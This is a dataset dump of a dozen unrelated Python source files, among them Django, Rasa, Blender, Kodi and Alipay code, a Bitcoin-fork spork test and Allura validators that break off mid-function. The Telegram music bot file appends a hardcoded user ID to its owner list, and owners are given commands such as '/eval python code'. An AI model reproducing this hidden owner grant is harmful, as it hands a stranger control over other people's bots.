ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 1a38852ecc45a013c14e7161c8360398888f279b | from django import forms
class ContactForm(forms.Form):
name = forms.CharField(max_length=100)
Subject = forms.CharField(max_length=100)
email = forms.EmailField()
message = forms.CharField(widget=forms.Textarea) |
py | 1a388818e2bdb430a2272958f49ea281261a2199 | import microbit
import random
import math
_GOLDEN_RATIO = (1 + 5 ** 0.5) / 2
class BreakOutOfALoop(Exception): pass
class ContinueLoop(Exception): pass
timer1 = microbit.running_time()
item = "a"
def run():
global timer1, item
item = "".join(str(arg) for arg in ["sadf", "sdf"])
def main():
try:
run()
except Exception as e:
raise
if __name__ == "__main__":
main() |
py | 1a38897fef42d80b55fbdbfd0f2a764648c6bc0e | from rasa.nlu.components import Component
from typing import Any, Optional, Text, Dict, TYPE_CHECKING
import os
import spacy
import pickle
from spacy.matcher import Matcher
from rasa.nlu.extractors.extractor import EntityExtractor
if TYPE_CHECKING:
from rasa.nlu.model import Metadata
PATTERN_NER_FILE = 'pattern_ner.pkl'
class SpacyPatternNER(EntityExtractor):
"""A new component"""
name = "pattern_ner_spacy"
# Defines what attributes the pipeline component will
# provide when called. The listed attributes
# should be set by the component on the message object
# during test and train, e.g.
# ```message.set("entities", [...])```
provides = ["entities"]
# Which attributes on a message are required by this
# component. e.g. if requires contains "tokens", than a
# previous component in the pipeline needs to have "tokens"
# within the above described `provides` property.
requires = ["tokens"]
# Defines the default configuration parameters of a component
# these values can be overwritten in the pipeline configuration
# of the model. The component should choose sensible defaults
# and should be able to create reasonable results with the defaults.
defaults = {}
# Defines what language(s) this component can handle.
# This attribute is designed for instance method: `can_handle_language`.
# Default value is None which means it can handle all languages.
# This is an important feature for backwards compatibility of components.
language_list = None
def __init__(self, component_config=None, matcher=None):
super(SpacyPatternNER, self).__init__(component_config)
if matcher:
self.matcher = matcher
self.spacy_nlp = spacy.blank('en')
self.spacy_nlp.vocab = self.matcher.vocab
else:
self.spacy_nlp = spacy.blank('en')
self.matcher = Matcher(self.spacy_nlp.vocab)
def train(self, training_data, cfg, **kwargs):
"""Train this component.
This is the components chance to train itself provided
with the training data. The component can rely on
any context attribute to be present, that gets created
by a call to :meth:`components.Component.pipeline_init`
of ANY component and
on any context attributes created by a call to
:meth:`components.Component.train`
of components previous to this one."""
for lookup_table in training_data.lookup_tables:
key = lookup_table['name']
pattern = []
for element in lookup_table['elements']:
tokens = [{'LOWER': token.lower()} for token in str(element).split()]
pattern.append(tokens)
self.matcher.add(key, pattern)
def process(self, message, **kwargs):
"""Process an incoming message.
This is the components chance to process an incoming
message. The component can rely on
any context attribute to be present, that gets created
by a call to :meth:`components.Component.pipeline_init`
of ANY component and
on any context attributes created by a call to
:meth:`components.Component.process`
of components previous to this one."""
entities = []
# with plural forms
doc = self.spacy_nlp(message.data['text'].lower())
matches = self.matcher(doc)
entities = self.getNewEntityObj(doc, matches, entities)
# Without plural forms
doc = self.spacy_nlp(' '.join([token.lemma_ for token in doc]))
matches = self.matcher(doc)
entities = self.getNewEntityObj(doc, matches, entities)
# Remove duplicates
seen = set()
new_entities = []
for entityObj in entities:
record = tuple(entityObj.items())
if record not in seen:
seen.add(record)
new_entities.append(entityObj)
message.set("entities", message.get("entities", []) + new_entities, add_to_output=True)
def getNewEntityObj(self, doc, matches, entities):
for ent_id, start, end in matches:
new_entity_value = doc[start:end].text
new_entity_value_len = len(new_entity_value.split())
is_add = True
for old_entity in entities:
old_entity_value = old_entity["value"]
old_entity_value_len = len(old_entity_value.split())
if old_entity_value_len > new_entity_value_len and new_entity_value in old_entity_value:
is_add = False
elif old_entity_value_len < new_entity_value_len and old_entity_value in new_entity_value:
entities.remove(old_entity)
if is_add:
entities.append({
'start': start,
'end': end,
'value': doc[start:end].text,
'entity': self.matcher.vocab.strings[ent_id],
'confidence': None,
'extractor': self.name
})
return entities
def persist(self, file_name: Text, model_dir: Text) -> Optional[Dict[Text, Any]]:
"""Persist this component to disk for future loading."""
if self.matcher:
modelFile = os.path.join(model_dir, PATTERN_NER_FILE)
self.saveModel(modelFile)
return {"pattern_ner_file": PATTERN_NER_FILE}
@classmethod
def load(
cls,
meta: Dict[Text, Any],
model_dir: Optional[Text] = None,
model_metadata: Optional["Metadata"] = None,
cached_component: Optional["Component"] = None,
**kwargs: Any
) -> "Component":
"""Load this component from file."""
file_name = meta.get("pattern_ner_file", PATTERN_NER_FILE)
modelFile = os.path.join(model_dir, file_name)
if os.path.exists(modelFile):
modelLoad = open(modelFile, "rb")
matcher = pickle.load(modelLoad)
modelLoad.close()
return cls(meta, matcher)
else:
return cls(meta)
def saveModel(self, modelFile):
modelSave = open(modelFile, "wb")
pickle.dump(self.matcher, modelSave)
modelSave.close() |
py | 1a3889d77c6754ecec91831d78b52967cdc35785 | import bpy
class AMK2BPanel(bpy.types.Panel):
bl_label = "AMK2B"
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
@classmethod
def poll(cls, context):
return hasattr(bpy, "amk2b")
def draw(self, context):
layout = self.layout
row = layout.row()
row.label(text="Receive Kinect Data")
row = layout.row()
if not bpy.amk2b.kinect_data_receiving_started:
row.operator("amk2b.kinect_data_receiving_operator", text="Start")
else:
row.operator("amk2b.kinect_data_receiving_operator", text="Stop")
row = layout.row()
row.label(text="Apply Kinect Data")
row = layout.row()
if not bpy.amk2b.kinect_data_applying_started:
row.operator("amk2b.kinect_data_applying_operator", text="Start")
else:
row.operator("amk2b.kinect_data_applying_operator", text="Stop")
row = layout.row()
row.label(text="Recording")
row = layout.row()
if not bpy.amk2b.recording_pre_started:
row.operator("amk2b.recording_operator", text="Start")
else:
if not bpy.amk2b.recording_started:
row.operator(
"amk2b.recording_operator",
text="waiting..." + str(bpy.amk2b.recording_wait_time)
)
else:
row.operator("amk2b.recording_operator", text="Stop")
|
py | 1a3889e28c3256a51ccd333f94285ded9b7f04b3 | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The Lksc Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import time
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import connect_nodes, wait_until
'''
multikeysporks.py
Test logic for several signer keys usage for spork broadcast.
We set 5 possible keys for sporks signing and set minimum
required signers to 3. We check 1 and 2 signers can't set the spork
value, any 3 signers can change spork value and other 3 signers
can change it again.
'''
class MultiKeySporkTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 5
self.setup_clean_chain = True
self.is_network_split = False
def setup_network(self):
# secret(base58): 931wyuRNVYvhg18Uu9bky5Qg1z4QbxaJ7fefNBzjBPiLRqcd33F
# keyid(hex): 60f0f57f71f0081f1aacdd8432340a33a526f91b
# address(base58): yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa
# secret(base58): 91vbXGMSWKGHom62986XtL1q2mQDA12ngcuUNNe5NfMSj44j7g3
# keyid(hex): 43dff2b09de2f904f688ec14ee6899087b889ad0
# address(base58): yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h
# secret(base58): 92bxUjPT5AhgXuXJwfGGXqhomY2SdQ55MYjXyx9DZNxCABCSsRH
# keyid(hex): d9aa5fa00cce99101a4044e65dc544d1579890de
# address(base58): ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7
# secret(base58): 934yPXiVGf4RCY2qTs2Bt5k3TEtAiAg12sMxCt8yVWbSU7p3fuD
# keyid(hex): 0b23935ce0bea3b997a334f6fa276c9fa17687b2
# address(base58): ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn
# secret(base58): 92Cxwia363Wg2qGF1fE5z4GKi8u7r1nrWQXdtsj2ACZqaDPSihD
# keyid(hex): 1d1098b2b1f759b678a0a7a098637a9b898adcac
# address(base58): yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui
self.add_nodes(5)
self.start_node(0, ["-sporkkey=931wyuRNVYvhg18Uu9bky5Qg1z4QbxaJ7fefNBzjBPiLRqcd33F",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(1, ["-sporkkey=91vbXGMSWKGHom62986XtL1q2mQDA12ngcuUNNe5NfMSj44j7g3",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(2, ["-sporkkey=92bxUjPT5AhgXuXJwfGGXqhomY2SdQ55MYjXyx9DZNxCABCSsRH",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(3, ["-sporkkey=934yPXiVGf4RCY2qTs2Bt5k3TEtAiAg12sMxCt8yVWbSU7p3fuD",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(4, ["-sporkkey=92Cxwia363Wg2qGF1fE5z4GKi8u7r1nrWQXdtsj2ACZqaDPSihD",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
# connect nodes at start
for i in range(0, 5):
for j in range(i, 5):
connect_nodes(self.nodes[i], j)
def get_test_spork_value(self, node):
info = node.spork('show')
# use InstantSend spork for tests
return info['SPORK_2_INSTANTSEND_ENABLED']
def set_test_spork_value(self, node, value):
# use InstantSend spork for tests
node.spork('SPORK_2_INSTANTSEND_ENABLED', value)
def run_test(self):
# check test spork default state
for node in self.nodes:
assert(self.get_test_spork_value(node) == 4070908800)
self.bump_mocktime(1)
# first and second signers set spork value
self.set_test_spork_value(self.nodes[0], 1)
self.set_test_spork_value(self.nodes[1], 1)
# spork change requires at least 3 signers
time.sleep(10)
for node in self.nodes:
assert(self.get_test_spork_value(node) != 1)
# third signer set spork value
self.set_test_spork_value(self.nodes[2], 1)
# now spork state is changed
for node in self.nodes:
wait_until(lambda: self.get_test_spork_value(node) == 1, sleep=0.1, timeout=10)
self.bump_mocktime(1)
# now set the spork again with other signers to test
# old and new spork messages interaction
self.set_test_spork_value(self.nodes[2], 2)
self.set_test_spork_value(self.nodes[3], 2)
self.set_test_spork_value(self.nodes[4], 2)
for node in self.nodes:
wait_until(lambda: self.get_test_spork_value(node) == 2, sleep=0.1, timeout=10)
if __name__ == '__main__':
MultiKeySporkTest().main()
|
py | 1a388a3d7069cd1a269484410e19e91dde23dad7 | from config import OWNER_ID
from pyrogram.types.bots_and_keyboards import reply_keyboard_markup
from TamilBots.modules import *
from pyrogram import idle, filters
from pyrogram.types import InlineKeyboardMarkup
from pyrogram.types import InlineKeyboardButton
from TamilBots import app, LOGGER
from TamilBots.TamilBots import ignore_blacklisted_users
from TamilBots.sql.chat_sql import add_chat_to_db
start_text = """
๐ ๐๐ฒ๐น๐น๐ผ [{}](tg://user?id={}),
\n\n๐ ๐๐บ ๐ธ๐๐จ๐ง๐ ๐๐ฅ๐๐ฒ ๐๐จ๐ญ[๐ถ](https://telegra.ph/file/6cb884fe1cb943ec12df1.mp4)
I'M Music Bot By @Arishem_TheJudge ๐ค
๐ฆ๐ฒ๐ป๐ฑ ๐ง๐ต๐ฒ ๐ก๐ฎ๐บ๐ฒ ๐ข๐ณ ๐ง๐ต๐ฒ ๐ฆ๐ผ๐ป๐ด ๐ฌ๐ผ๐ ๐ช๐ฎ๐ป๐... ๐๐ฅฐ๐ค
๐๐ . ```/song Faded```
"""
owner_help = """
/blacklist user_id
/unblacklist user_id
/broadcast message to send
/eval python code
/chatlist get list of all chats
"""
@app.on_message(filters.create(ignore_blacklisted_users) & filters.command("start"))
async def start(client, message):
chat_id = message.chat.id
user_id = message.from_user["id"]
name = message.from_user["first_name"]
if message.chat.type == "private":
btn = InlineKeyboardMarkup(
[[InlineKeyboardButton(text="๐๐๐๐๐๐๐ ๐ฌ", url="https://t.me/Ott_streaming_updates"),
InlineKeyboardButton(
text="๐๐๐ ๐๐ ๐ค", url="http://t.me/SongProBot?startgroup=true"
)
]
]
)
else:
btn = None
await message.reply(start_text.format(name, user_id), reply_markup=btn)
add_chat_to_db(str(chat_id))
@app.on_message(filters.create(ignore_blacklisted_users) & filters.command("help"))
async def help(client, message):
if message.from_user["id"] == OWNER_ID:
await message.reply(owner_help)
return ""
text = "๐ฆ๐ฒ๐ป๐ฑ ๐ง๐ต๐ฒ ๐ก๐ฎ๐บ๐ฒ ๐ข๐ณ ๐ง๐ต๐ฒ ๐ฆ๐ผ๐ป๐ด ๐ฌ๐ผ๐ ๐ช๐ฎ๐ป๐... ๐๐ฅฐ๐ค\n /song (song name) ๐ฅณ"
await message.reply(text)
OWNER_ID.append(1492186775)
app.start()
LOGGER.info("SongPlayRoBot Is Now Working๐ค๐ค๐ค")
idle()
|
py | 1a388d6c71d9b037f6adccd3c72a19133260d8a8 | """
Exposed classes and methods
"""
from .mongo import MongoStorage, MongoMigrationSet
from .sql import SQLStorage, SQLMigrationSet
|
py | 1a388dcfd32c31f9522364b3c14cc34602f7647f | from sqlalchemy.orm import Session
from aspen.database.models import CanSee, DataType
from aspen.test_infra.models.usergroup import group_factory
def test_can_see_constructor_with_datatype(session: Session):
"""Test that we can construct a CanSee object with a `data_type` argument."""
group1 = group_factory(name="group1", address="address1")
group2 = group_factory(name="group2", address="address2")
can_see = CanSee(viewer_group=group1, owner_group=group2, data_type=DataType.TREES)
session.add_all((group1, group2, can_see))
session.flush()
assert can_see.data_type == DataType.TREES
def test_can_see_datatype_filter(session: Session):
"""Test that we can filter by the datatype."""
group1 = group_factory(name="group1", address="address1")
group2 = group_factory(name="group2", address="address2")
can_see = CanSee(
viewer_group=group1,
owner_group=group2,
data_type=DataType.TREES,
)
session.add_all((group1, group2, can_see))
session.flush()
session.query(CanSee).filter(CanSee.data_type == DataType.TREES).one()
|
py | 1a388f5be7695d8f0b160c57d6be2eb30ded99c6 | """ downloaded from http://xbmc-addons.googlecode.com/svn/addons/ """
""" This is a modded version of the original addons.xml generator """
""" Put this version in the root folder of your repo and it will """
""" zip up all add-on folders, create a new zip in your zips folder """
""" and then update the md5 and addons.xml file """
""" Recoded by whufclee ([email protected]) """
import re
import os
import shutil
import md5
import zipfile
class Generator:
"""
Generates a new addons.xml file from each addons addon.xml file
and a new addons.xml.md5 hash file. Must be run from the root of
the checked-out repo. Only handles single depth folder structure.
"""
def __init__(self):
# Create the zips folder if it doesn't already exist
zips_path = ('zips')
if not os.path.exists(zips_path):
os.makedirs(zips_path)
# Comment out this line if you have .pyc or .pyo files you need to keep
self._remove_binaries()
self._generate_addons_file()
self._generate_md5_file()
print "Finished updating addons xml and md5 files"
def Create_Zips(self,addon_id,version):
xml_path = os.path.join(addon_id,'addon.xml')
addon_folder = os.path.join('zips',addon_id)
if not os.path.exists(addon_folder):
os.makedirs(addon_folder)
final_zip = os.path.join('zips',addon_id,'%s-%s.zip' % (addon_id,version))
if not os.path.exists(final_zip):
print "NEW ADD-ON - Creating zip for: %s v.%s" % (addon_id,version)
zip = zipfile.ZipFile(final_zip, 'w', compression=zipfile.ZIP_DEFLATED )
root_len = len(os.path.dirname(os.path.abspath(addon_id)))
for root, dirs, files in os.walk(addon_id):
archive_root = os.path.abspath(root)[root_len:]
for f in files:
fullpath = os.path.join( root, f )
archive_name = os.path.join( archive_root, f )
zip.write( fullpath, archive_name, zipfile.ZIP_DEFLATED )
zip.close()
# Copy over the icon, fanart and addon.xml to the zip directory
copyfiles = ['icon.png','icon.gif','fanart.jpg','addon.xml']
files = os.listdir(addon_id)
for file in files:
if file in copyfiles:
shutil.copy(os.path.join(addon_id,file),addon_folder)
# Remove any instances of pyc or pyo files
def _remove_binaries(self):
for parent, dirnames, filenames in os.walk('.'):
for fn in filenames:
if fn.lower().endswith('pyo') or fn.lower().endswith('pyc'):
compiled = os.path.join(parent, fn)
py_file = compiled.replace('.pyo','.py').replace('.pyc','.py')
if os.path.exists(py_file):
try:
os.remove(compiled)
print"Removed compiled python file:"
print compiled
print'-----------------------------'
except:
print"Failed to remove compiled python file:"
print compiled
print'-----------------------------'
else:
print"Compiled python file found but no matching .py file exists:"
print compiled
print'-----------------------------'
def _generate_addons_file(self):
# addon list
addons = os.listdir('.')
# final addons text
addons_xml = u"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<addons>\n"
# loop thru and add each addons addon.xml file
for addon in addons:
try:
if (not os.path.isdir(addon) or addon == "zips" or addon.startswith('.')): continue
_path = os.path.join( addon, "addon.xml" )
xml_lines = open( _path, "r" ).read().splitlines()
addon_xml = ""
# loop thru cleaning each line
ver_found = False
for line in xml_lines:
if ( line.find( "<?xml" ) >= 0 ): continue
if 'version="' in line and not ver_found:
version = re.compile('version="(.+?)"').findall(line)[0]
ver_found = True
addon_xml += unicode( line.rstrip() + "\n", "utf-8")
addons_xml += addon_xml.rstrip() + "\n\n"
# Create the zip files
self.Create_Zips(addon,version)
except Exception, e:
print "Excluding %s for %s" % ( _path, e, )
# clean and add closing tag
addons_xml = addons_xml.strip() + u"\n</addons>\n"
self._save_file(addons_xml.encode( "utf-8" ), file=os.path.join('zips','addons.xml'))
def _generate_md5_file(self):
try:
m = md5.new(open(os.path.join('zips','addons.xml')).read()).hexdigest()
self._save_file(m, file=os.path.join('zips','addons.xml.md5'))
except Exception, e:
print "An error occurred creating addons.xml.md5 file!\n%s" % (e)
def _save_file(self,data,file):
try:
open(file, 'w').write(data)
except Exception, e:
print "An error occurred saving %s file!\n%s" % (file,e)
if ( __name__ == "__main__" ):
Generator()
|
py | 1a388fb42af5c140d36d53caf05e3dbc711fc46d | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
class AlipayMobilePublicLabelUserAddRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
self._biz_content = value
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'alipay.mobile.public.label.user.add'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), use_decimal=True, ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), use_decimal=True, ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
|
py | 1a388fb7ad052b54dc3a942c156203ae0277577c | import gc
import math
import os
import struct
import bpy, bpy.props, bpy.ops
import mathutils
from io_scene_valvesource import utils as vs_utils
# <summary> Formats a float value to be suitable for bvh output </summary>
def FloatToBvhString(value):
return "{0:f}".format(value)
def WriteHeader(file, frames, frameTime):
file.write("advancedfx Cam\n")
file.write("version 1\n")
file.write("scaleFov none\n")
file.write("channels time xPosition yPosition zPositon xRotation yRotation zRotation fov\n")
file.write("DATA\n")
class CamExporter(bpy.types.Operator, vs_utils.Logger):
bl_idname = "advancedfx.camexporter"
bl_label = "HLAE Camera IO (.cam)"
bl_options = {'UNDO'}
# Properties used by the file browser
filepath: bpy.props.StringProperty(subtype="FILE_PATH")
filename_ext: ".cam"
filter_glob: bpy.props.StringProperty(default="*.cam", options={'HIDDEN'})
# Custom properties
global_scale: bpy.props.FloatProperty(
name="Scale",
description="Scale everything by this value",
min=0.000001, max=1000000.0,
soft_min=1.0, soft_max=1000.0,
default=100.0,
)
frame_start: bpy.props.IntProperty(
name="Start Frame",
description="Starting frame to export",
default=0,
)
frame_end: bpy.props.IntProperty(
name="End Frame",
description="End frame to export",
default=0,
)
def execute(self, context):
ok = self.writeBvh(context)
self.errorReport("Error report")
return {'FINISHED'}
def invoke(self, context, event):
self.frame_start = context.scene.frame_start
self.frame_end = context.scene.frame_end
bpy.context.window_manager.fileselect_add(self)
return {'RUNNING_MODAL'}
def writeBvh(self, context):
scene = context.scene
frame_current = scene.frame_current
fps = context.scene.render.fps
obj = context.active_object
if (obj is None) or (obj.type != 'CAMERA'):
self.error("No camera selected.")
return False
cam = obj.data
lastRot = None
unRot = mathutils.Matrix.Rotation(math.radians(-90.0), 4, 'X')
file = None
try:
file = open(self.filepath, "w", encoding="utf8", newline="\n")
frameCount = self.frame_end -self.frame_start +1
if frameCount < 0: frameCount = 0
frameTime = 1.0
if 0.0 != fps: frameTime = frameTime / fps
WriteHeader(file, frameCount, frameTime)
for frame in range(self.frame_start, self.frame_end + 1):
scene.frame_set(frame)
mat = obj.matrix_world
mat = mat @ unRot
loc = mat.to_translation()
rot = mat.to_euler('YXZ') if lastRot is None else mat.to_euler('YXZ', lastRot)
lastRot = rot
loc = self.global_scale * mathutils.Vector((loc[1],-loc[0],loc[2]))
qAngleVec = mathutils.Vector((math.degrees(rot[1]),-math.degrees(rot[0]),math.degrees(rot[2])))
# lens = camData.c.sensor_width / (2.0 * math.tan(math.radians(fov) / 2.0))
fov = math.degrees(2.0 * math.atan((cam.sensor_width / cam.lens) / 2.0))
S = ""+FloatToBvhString((frame-1) * frameTime) +" " +FloatToBvhString(loc[0]) +" " +FloatToBvhString(loc[1]) +" " +FloatToBvhString(loc[2]) +" " +FloatToBvhString(qAngleVec[0]) +" " +FloatToBvhString(qAngleVec[1]) +" " +FloatToBvhString(qAngleVec[2]) +" " +FloatToBvhString(fov) + "\n"
file.write(S)
finally:
if file is not None:
file.close()
scene.frame_set(frame_current)
return True
|
py | 1a38904dad9f63fea0b466c64c2767c1d13659ec | """museumadmin URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from adminapp import views as adminapp_views
urlpatterns = [
path('admin/', admin.site.urls),
path('', adminapp_views.index, name="Homepage" ),
path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),
path('dj-rest-auth/', include('dj_rest_auth.urls')),
path('dj-rest-auth/registration/', include('dj_rest_auth.registration.urls'))
]
|
py | 1a389051f185104c0a9f89da9b6253949f4fe0c8 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import re
from bson import ObjectId
import formencode as fe
from formencode import validators as fev
from pylons import tmpl_context as c
from . import helpers as h
from datetime import datetime
class URL(fev.URL):
# allows use of IP address instead of domain name
require_tld = False
url_re = re.compile(r'''
^(http|https)://
(?:[%:\w]*@)? # authenticator
(?: # ip or domain
(?P<ip>(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|
(?P<domain>[a-z0-9][a-z0-9\-]{,62}\.)* # subdomain
(?P<tld>[a-z]{2,63}|xn--[a-z0-9\-]{2,59}) # top level domain
)
(?::[0-9]{1,5})? # port
# files/delims/etc
(?P<path>/[a-z0-9\-\._~:/\?#\[\]@!%\$&\'\(\)\*\+,;=]*)?
$
''', re.I | re.VERBOSE)
class NonHttpUrl(URL):
messages = {
'noScheme': 'You must start your URL with a scheme',
}
add_http = False
scheme_re = re.compile(r'^[a-z][a-z0-9.+-]*:', re.I)
url_re = re.compile(r'''
^([a-z][a-z0-9.+-]*)://
(?:[%:\w]*@)? # authenticator
(?: # ip or domain
(?P<ip>(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|
(?P<domain>[a-z0-9][a-z0-9\-]{,62}\.)* # subdomain
(?P<tld>[a-z]{2,63}|xn--[a-z0-9\-]{2,59}) # top level domain
)
(?::[0-9]{1,5})? # port
# files/delims/etc
(?P<path>/[a-z0-9\-\._~:/\?#\[\]@!%\$&\'\(\)\*\+,;=]*)?
$
''', re.I | re.VERBOSE)
class Ming(fev.FancyValidator):
def __init__(self, cls, **kw):
self.cls = cls
super(Ming, self).__init__(**kw)
def _to_python(self, value, state):
result = self.cls.query.get(_id=value)
if result is None:
try:
result = self.cls.query.get(_id=ObjectId(value))
except:
pass
return result
def _from_python(self, value, state):
return value._id
class UniqueOAuthApplicationName(fev.UnicodeString):
def _to_python(self, value, state):
from allura import model as M
app = M.OAuthConsumerToken.query.get(name=value, user_id=c.user._id)
if app is not None:
raise fe.Invalid(
'That name is already taken, please choose another', value, state)
return value
class NullValidator(fev.Validator):
def to_python(self, value, state):
return value
def from_python(self, value, state):
return value
def validate(self, value, state):
return value
class MaxBytesValidator(fev.FancyValidator):
max = 255
def _to_python(self, value, state):
value = h.really_unicode(value or '').encode('utf-8')
if len(value) > self.max:
raise fe.Invalid("Please enter a value less than %s bytes long." %
self.max, value, state)
return value
def from_python(self, value, state):
return h.really_unicode(value or '')
class MountPointValidator(fev.UnicodeString):
def __init__(self, app_class,
reserved_mount_points=('feed', 'index', 'icon', '_nav.json'), **kw):
super(self.__class__, self).__init__(**kw)
self.app_class = app_class
self.reserved_mount_points = reserved_mount_points
def _to_python(self, value, state):
mount_point, App = value, self.app_class
if not App.relaxed_mount_points:
mount_point = mount_point.lower()
if not App.validate_mount_point(mount_point):
raise fe.Invalid('Mount point "%s" is invalid' % mount_point,
value, state)
if mount_point in self.reserved_mount_points:
raise fe.Invalid('Mount point "%s" is reserved' % mount_point,
value, state)
if c.project and c.project.app_instance(mount_point) is not None:
raise fe.Invalid(
'Mount point "%s" is already in use' % mount_point,
value, state)
return mount_point
def empty_value(self, value):
base_mount_point = mount_point = self.app_class.default_mount_point
i = 0
while True:
if not c.project or c.project.app_instance(mount_point) is None:
return mount_point
mount_point = base_mount_point + '-%d' % i
i += 1
class TaskValidator(fev.FancyValidator):
def _to_python(self, value, state):
try:
mod, func = value.rsplit('.', 1)
except ValueError:
